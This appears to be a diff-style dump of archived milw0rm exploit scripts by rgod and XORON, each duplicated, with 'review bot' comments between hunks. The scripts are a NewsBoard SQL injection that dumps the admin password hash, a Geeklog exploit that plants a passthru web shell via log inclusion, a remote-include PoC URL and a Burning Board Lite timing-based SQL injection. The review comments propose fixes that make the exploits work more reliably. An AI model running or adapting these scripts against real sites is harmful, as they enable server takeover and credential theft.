while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
if (($host<>"") and ($path<>"") and ($fullpath<>""))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($table_prefix=='') {$table_prefix="unb1_";}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
#STEP 1 -> Dump Admin MD5 password hash...
$SQL="9999999999) UNION SELECT ORD(SUBSTRING(Password,1,1)),ORD(SUBSTRING(Password,2,1)),ORD(SUBSTRING(Password,3,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,4,1)),ORD(SUBSTRING(Password,5,1)),ORD(SUBSTRING(Password,6,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,7,1)),ORD(SUBSTRING(Password,8,1)),ORD(SUBSTRING(Password,9,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,10,1)),ORD(SUBSTRING(Password,11,1)),ORD(SUBSTRING(Password,12,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,13,1)),ORD(SUBSTRING(Password,14,1)),ORD(SUBSTRING(Password,15,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,16,1)),ORD(SUBSTRING(Password,17,1)),ORD(SUBSTRING(Password,18,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,19,1)),ORD(SUBSTRING(Password,20,1)),ORD(SUBSTRING(Password,21,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,22,1)),ORD(SUBSTRING(Password,23,1)),ORD(SUBSTRING(Password,24,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,25,1)),ORD(SUBSTRING(Password,26,1)),ORD(SUBSTRING(Password,27,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,28,1)),ORD(SUBSTRING(Password,29,1)),ORD(SUBSTRING(Password,30,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,31,1)),ORD(SUBSTRING(Password,32,1)),NULL INTO OUTFILE '".$fullpath."suntzu' FROM ".$table_prefix."users WHERE ID=1/*";
$SQL=urlencode($SQL);
$packet="GET ".$p."forum.php?req=search&Query=suntzu&ResultView=2&Sort=2&DateFrom=".$SQL."&DateUntil=&Forum=0 HTTP/1.1\r\n";
$packet.="Referer: http://".$host.":".$port.$path."forum.php?req=search&unb236sess=\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
#STEP 2 -> Retrieve dump and decode...
$packet="GET ".$p."suntzu HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("200 OK",$html))
{
$temp=explode(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html);
$dump=$temp[1];
$temp2=''; $HASH='';
for ($i=0; $i<=strlen($dump)-1; $i++)
{
if (($dump[$i]==chr(0x09)) or ($dump[$i]==chr(0x0a)))
{$HASH.=chr($temp2); $temp2='';}
else
{$temp2.=$dump[$i]; if ($temp2=="\N") {break;} }
}
echo "<br>Exploit succeeded -> ".$HASH;
}
else
{echo "Exploit failed...";}
}
else
{echo "Fill * requested fields, optionally specify a proxy...";}
?>
# milw0rm.com [2005-11-14]
<?php
# ---UNB153pl3_xpl.php 11.35 12/11/2005 #
# #
# Unclassified NewsBoard 1.5.3 patch level 3 "Datefrom" blind SQL #
# injection / Admin MD5 password hash dump #
# by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# make these changes in php.ini if you have troubles #
# with this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# Sun-tzu:"If he is taking his ease, give him no rest. If his forces are #
# united, separate them." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title> Unclassified NewsBoard 1.5.3pl3 blind SQL injection
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
Unclassified NewsBoard 1.5.3pl3 blind SQL injection </p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&proxy=value"> <p> <input type="text" name="host"> <span
class="Stile5"> * hostname (ex: www.sitename.com) </span> </p> <p> <input
type="text" name="path"> <span class="Stile5"> * path ( ex: /unb/ or just / )
</span></p><p> <input type="text" name="fullpath"><span class="Stile5"> * full
path to site, need this for "INTO OUTFILE" statement (ex.: C:\\\www\\\site\\\)
</span></p><p> <input type="text" name="table_prefix"> <span class="Stile5">
specify a table prefix other than the default (unb1_)</span> </p><p><input
type="text" name="port"> <span class="Stile5">specify a port other than 80
( default value ) </span> </p> <p> <input type="text" name="proxy"> <span
class="Stile5"> send exploit through an HTTP proxy (ip:port) </span></p><p>
<input type="submit"name="Submit" value="go!"> </p> </form> </td> </tr> </table>
</body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
if (($host<>"") and ($path<>"") and ($fullpath<>""))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($table_prefix=='') {$table_prefix="unb1_";}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
#STEP 1 -> Dump Admin MD5 password hash...
$SQL="9999999999) UNION SELECT ORD(SUBSTRING(Password,1,1)),ORD(SUBSTRING(Password,2,1)),ORD(SUBSTRING(Password,3,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,4,1)),ORD(SUBSTRING(Password,5,1)),ORD(SUBSTRING(Password,6,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,7,1)),ORD(SUBSTRING(Password,8,1)),ORD(SUBSTRING(Password,9,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,10,1)),ORD(SUBSTRING(Password,11,1)),ORD(SUBSTRING(Password,12,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,13,1)),ORD(SUBSTRING(Password,14,1)),ORD(SUBSTRING(Password,15,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,16,1)),ORD(SUBSTRING(Password,17,1)),ORD(SUBSTRING(Password,18,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,19,1)),ORD(SUBSTRING(Password,20,1)),ORD(SUBSTRING(Password,21,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,22,1)),ORD(SUBSTRING(Password,23,1)),ORD(SUBSTRING(Password,24,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,25,1)),ORD(SUBSTRING(Password,26,1)),ORD(SUBSTRING(Password,27,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,28,1)),ORD(SUBSTRING(Password,29,1)),ORD(SUBSTRING(Password,30,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,31,1)),ORD(SUBSTRING(Password,32,1)),NULL INTO OUTFILE '".$fullpath."suntzu' FROM ".$table_prefix."users WHERE ID=1/*";
$SQL=urlencode($SQL);
$packet="GET ".$p."forum.php?req=search&Query=suntzu&ResultView=2&Sort=2&DateFrom=".$SQL."&DateUntil=&Forum=0 HTTP/1.1\r\n";
$packet.="Referer: http://".$host.":".$port.$path."forum.php?req=search&unb236sess=\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
#STEP 2 -> Retrieve dump and decode...
$packet="GET ".$p."suntzu HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("200 OK",$html))
{
$temp=explode(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html);
$dump=$temp[1];
$temp2=''; $HASH='';
for ($i=0; $i<=strlen($dump)-1; $i++)
{
if (($dump[$i]==chr(0x09)) or ($dump[$i]==chr(0x0a)))
{$HASH.=chr($temp2); $temp2='';}
else
{$temp2.=$dump[$i]; if ($temp2=="\N") {break;} }
}
echo "<br>Exploit succeeded -> ".$HASH;
}
else
{echo "Exploit failed...";}
}
else
{echo "Fill * requested fields, optionally specify a proxy...";}
?>
# milw0rm.com [2005-11-14]
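Review bot: the old and new copies of UNB153pl3_xpl.php are identical in content, so this hunk is a line-ending or trailing-whitespace change only and the commit message should say so instead of letting it render as a full-file rewrite. Two defects are carried over unchanged and are worth fixing while the file is touched: the form action in the HTML header uses `$SERVER[PHP_SELF]`, which is not the `$_SERVER['PHP_SELF']` superglobal, so the action resolves to an empty string and the script only works because it relies on `register_globals`; and `sendpacket()` (the sockets variant) runs `preg_match($proxy_regex,$proxy)` before it tests `$proxy==''`, so it would `die` with 'Not a valid prozy...' whenever no proxy is given. That second bug is masked only because the main flow calls `sendpacketii()` and never `sendpacket()`; either fix the ordering or drop the dead function.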

@ -92,6 +92,6 @@ while ($answer = <$socket>)
print "[+] USER: $1 \n[+] MD5 HASH: $6\n";
}
}
if ($success == 0) { print "[-] exploit failed =(\n"; }
# milw0rm.com [2003-12-21]
if ($success == 0) { print "[-] exploit failed =(\n"; }
# milw0rm.com [2003-12-21]
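Review bot: the removed and added versions of the `if ($success == 0)` line and of the milw0rm footer are byte-identical as rendered, so this hunk only changes line endings or trailing whitespace. That is acceptable for a bulk normalisation, but the commit message should state it, otherwise the diff reads as a change to the exploit's failure handling. No logic issue in the visible lines.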

@ -1,65 +1,65 @@
#!/usr/bin/perl -w
use IO::Socket;
print "*************************************************************************\r\n";
print "| Geeklog 1.* remote commands execution |\r\n";
print "| By rgod rgod<AT>autistici<DOT>org |\r\n";
print "| site: http://retrogod.altervista.org |\r\n";
print "| |\r\n";
print "*************************************************************************\r\n";
print "| -> this works against magic_quotes_gpc = Off |\r\n";
print "*************************************************************************\r\n";
sub main::urlEncode {
my ($string) = @_;
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
#$string# =~ tr/.//;
return $string;
}
$serv=$ARGV[0];
$path=$ARGV[1];
$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
if (@ARGV < 3)
{
print "Usage:\r\n";
print "perl pblg_xpl.pl SERVER PATH COMMAND\r\n\r\n";
print "SERVER - Server where Geeklog is installed.\r\n";
print "PATH - Path to Geeklog (ex: /geeklog/ or just /) \r\n";
print "COMMAND - a shell command (\"cat ./../config.php\" to see database\r\n";
print " username & password\")\r\n";
print "Example:\r\n";
print "perl geeklog_14_xpl.pl localhost /geeklog/ ls -la \r\n";
exit();
}
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
$shell='<?php ob_clean();echo"Hi Master!\r\n";ini_set("max_execution_time",0);passthru($_GET[CMD]);die;?>';
$shell=urlEncode($shell);
$data="loginname=sun&passwd=sun";
print $sock "POST ".$path."users.php HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Content-Length: ".length($data)."\r\n";
print $sock "Cookie: gl_session=%27".$shell."\r\n";
print $sock "Connection: Close\r\n\r\n";
print $sock $data;
close($sock);
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
$xpl="../logs/error.log";
$xpl=urlEncode($xpl)."%00";
print $sock "GET ".$path."index.php?CMD=".$cmd." HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Cookie: language=".$xpl.";\r\n";
print $sock "Connection: Close\r\n\r\n";
while ($answer = <$sock>) {
print $answer;
}
close($sock);
# milw0rm.com [2006-02-20]
#!/usr/bin/perl -w
use IO::Socket;
print "*************************************************************************\r\n";
print "| Geeklog 1.* remote commands execution |\r\n";
print "| By rgod rgod<AT>autistici<DOT>org |\r\n";
print "| site: http://retrogod.altervista.org |\r\n";
print "| |\r\n";
print "*************************************************************************\r\n";
print "| -> this works against magic_quotes_gpc = Off |\r\n";
print "*************************************************************************\r\n";
sub main::urlEncode {
my ($string) = @_;
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
#$string# =~ tr/.//;
return $string;
}
$serv=$ARGV[0];
$path=$ARGV[1];
$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
if (@ARGV < 3)
{
print "Usage:\r\n";
print "perl pblg_xpl.pl SERVER PATH COMMAND\r\n\r\n";
print "SERVER - Server where Geeklog is installed.\r\n";
print "PATH - Path to Geeklog (ex: /geeklog/ or just /) \r\n";
print "COMMAND - a shell command (\"cat ./../config.php\" to see database\r\n";
print " username & password\")\r\n";
print "Example:\r\n";
print "perl geeklog_14_xpl.pl localhost /geeklog/ ls -la \r\n";
exit();
}
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
$shell='<?php ob_clean();echo"Hi Master!\r\n";ini_set("max_execution_time",0);passthru($_GET[CMD]);die;?>';
$shell=urlEncode($shell);
$data="loginname=sun&passwd=sun";
print $sock "POST ".$path."users.php HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Content-Length: ".length($data)."\r\n";
print $sock "Cookie: gl_session=%27".$shell."\r\n";
print $sock "Connection: Close\r\n\r\n";
print $sock $data;
close($sock);
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
$xpl="../logs/error.log";
$xpl=urlEncode($xpl)."%00";
print $sock "GET ".$path."index.php?CMD=".$cmd." HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Cookie: language=".$xpl.";\r\n";
print $sock "Connection: Close\r\n\r\n";
while ($answer = <$sock>) {
print $answer;
}
close($sock);
# milw0rm.com [2006-02-20]
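Review bot: the usage text names the script `pblg_xpl.pl` while the Example line names it `geeklog_14_xpl.pl`; pick one so that copy-pasted invocations match the file. The argument check `if (@ARGV < 3)` also runs after `$cmd` has already been assembled from `@ARGV`, which is harmless but reads backwards; move the check above the argument parsing. Note for readers that the first POST carries no `Content-Type` header, which only works here because the body `loginname=sun&passwd=sun` is irrelevant to the attack: the payload travels in the `gl_session` cookie so that it is written to `../logs/error.log`, which the second request then includes via the `language` cookie with a `%00` terminator, hence the `magic_quotes_gpc = Off` requirement in the banner.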

@ -1,36 +1,36 @@
###########################################################
#Web Server Creator v0.1 (l) Remote Include Vulnerability
############################################################
#Author: XORON
############################################################
#URL: http://www.comscripts.com/jump.php?action=script&id=1082
############################################################
#Class: Remote
############################################################
#cont@ct: x0r0n[at]hotmail[dot]com
############################################################
#Code: include $l;
############################################################
#Exploit:
http://www.site.com/[path]/news/include/customize.php?l=http://evil_scripts?
############################################################
#Greetz: str0ke, Ironfist, Preddy, SHiKaA, gültekin
############################################################
# milw0rm.com [2006-09-07]
###########################################################
#Web Server Creator v0.1 (l) Remote Include Vulnerability
############################################################
#Author: XORON
############################################################
#URL: http://www.comscripts.com/jump.php?action=script&id=1082
############################################################
#Class: Remote
############################################################
#cont@ct: x0r0n[at]hotmail[dot]com
############################################################
#Code: include $l;
############################################################
#Exploit:
http://www.site.com/[path]/news/include/customize.php?l=http://evil_scripts?
############################################################
#Greetz: str0ke, Ironfist, Preddy, SHiKaA, gültekin
############################################################
# milw0rm.com [2006-09-07]
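Review bot: the vulnerable line quoted as `#Code: include $l;` reads `$l` as a plain variable, not `$_GET['l']`, so the remote include is only reachable with `register_globals = On` (or another path that assigns `$l` from request data) and with `allow_url_include`/`allow_url_fopen` permitting the `http://` target; the advisory should state those preconditions next to the PoC URL. Both copies of the text are otherwise identical, so this hunk is a whitespace or line-ending change only.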

@ -1,215 +1,215 @@
<?php
print_r('
--------------------------------------------------------------------------------
Woltlab Burning Board Lite 1.0.2 Zend_Hash_Del_Key_Or_Index /
/ blind sql injection exploit
by rgod retrog@alice.it
site: http://retrogod.altervista.org
dork: "Powered by Burning Board Lite 1.0.2 * 2001-2004"
--------------------------------------------------------------------------------
');
/*
magic_quotes_gpc=Off
works with register_globals = On
PHP < 4.4.3, 5 <= PHP < 5.1.4
*/
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to wbblite
Options:
-u[userid]: specify the userid of your target (default: 1, admin)
-p[port]: " a port other than 80
-P[ip:port]: " a proxy
-t[n]: adjust query timeout (default: 10)
-b[n]: " the delay for benchmark()
Example:
php '.$argv[0].' localhost /wbblite/ -P1.1.1.1:80
" " localhost / -u2 -p81
" " localhost /forum/ -t15 -b20000000
" " localhost / -t15 -b20000000
---------------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$uid=1;
$port=80;
$timeout=10;
$proxy="";
$b=100000000;
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-t")
{
$timeout=(int) str_replace("-t","",$argv[$i]);
}
if ($temp=="-b")
{
$b=(int) str_replace("-b","",$argv[$i]);
}
if ($temp=="-u")
{
$uid=(int) str_replace("-b","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data ="wbb_userid=%27";
$data.="&-246470575=1";
$data.="&-73279541=1";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: wbb_userpassword=0;\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("mysql error number:",$html)){
echo "vulnerable...\n";
$temp=explode("users LEFT JOIN",$html);$temp2=explode("FROM ",$temp[0]);$prefix=$temp2[1];
echo "prefix -> ".$prefix."\n";
}
else
{die("not vulnerable...");}
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql="9999999'/**/OR/**/".$prefix."users.userid=$uid/**/AND/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),BENCHMARK(".$b.",CHAR(0)),-1))/**/LIMIT/**/1/*";
$sql=urlencode($sql);
$data ="wbb_userid=$sql";
$data.="&-246470575=1";
$data.="&-73279541=1";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: wbb_userpassword=0;\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("mysql error number:",$html)) {
die($html."\n\n"."debug: you have to modify sql code injected, it seems a different version...");
}
usleep(20000);
$starttime=time();
echo "starttime -> ".$starttime."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > $timeout) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {
print_r('
--------------------------------------------------------------------------
cookie -> wbb_userid='.$uid.'; wbb_userpassword='.$hash.';
--------------------------------------------------------------------------
');
if ($uid==1) {
echo "done, but... to have access to admin panel you need to break the hash\n";
}
}
else {
echo "exploit failed...";
}
?>
# milw0rm.com [2006-11-23]
<?php
print_r('
--------------------------------------------------------------------------------
Woltlab Burning Board Lite 1.0.2 Zend_Hash_Del_Key_Or_Index /
/ blind sql injection exploit
by rgod retrog@alice.it
site: http://retrogod.altervista.org
dork: "Powered by Burning Board Lite 1.0.2 * 2001-2004"
--------------------------------------------------------------------------------
');
/*
magic_quotes_gpc=Off
works with register_globals = On
PHP < 4.4.3, 5 <= PHP < 5.1.4
*/
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to wbblite
Options:
-u[userid]: specify the userid of your target (default: 1, admin)
-p[port]: " a port other than 80
